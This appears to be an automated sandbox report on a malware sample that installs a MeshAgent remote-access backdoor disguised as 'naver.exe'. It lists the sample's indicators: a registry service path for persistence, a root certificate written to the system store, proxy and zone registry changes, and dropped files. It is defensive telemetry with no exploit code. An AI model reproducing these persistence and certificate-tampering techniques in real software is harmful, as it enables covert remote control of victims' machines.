Malware Analysis Report

2024-10-23 20:21

Sample ID 240924-nk1f4swfma
Target 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch
SHA256 d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402
Tags
meshagent backdoor discovery execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

Threat Level: Known bad

The file 2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch was found to be: Known bad.

Malicious Activity Summary

meshagent backdoor discovery execution persistence rat trojan

Detects MeshAgent payload

MeshAgent

Blocklisted process makes network request

Sets service image path in registry

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks installed software on the system

Drops file in System32 directory

Unsigned PE

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-24 11:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-24 11:28

Reported

2024-09-24 11:30

Platform

win7-20240903-en

Max time kernel

79s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-24 11:28

Reported

2024-09-24 11:30

Platform

win10v2004-20240802-en

Max time kernel

94s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

MeshAgent

rat trojan backdoor meshagent

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\naver Service\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\naver\\naver.exe\" --meshServiceName=\"naver Service\"" C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dll\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\shell32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\ole32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ntdll.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\user32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\2121346EBBB554A3F69F15BA4BDE39CB93B59549 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\1FEA0AE7DF9C1CE8F405F73E716F0906B8F38B20 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\MeshService64.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\msvcrt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AE20CF24999F1A151FDA441DA4540BCDA60F96F5 C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\msvcp_win.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\sechost.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\dll\combase.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\comctl32.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A
File opened for modification C:\Windows\System32\bcrypt.pdb C:\Users\Admin\AppData\Local\naver\naver.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133716509109858256" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\naver\naver.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-09-24_e664e32eae75f70aca3b95397beb8706_hijackloader_poet-rat_snatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
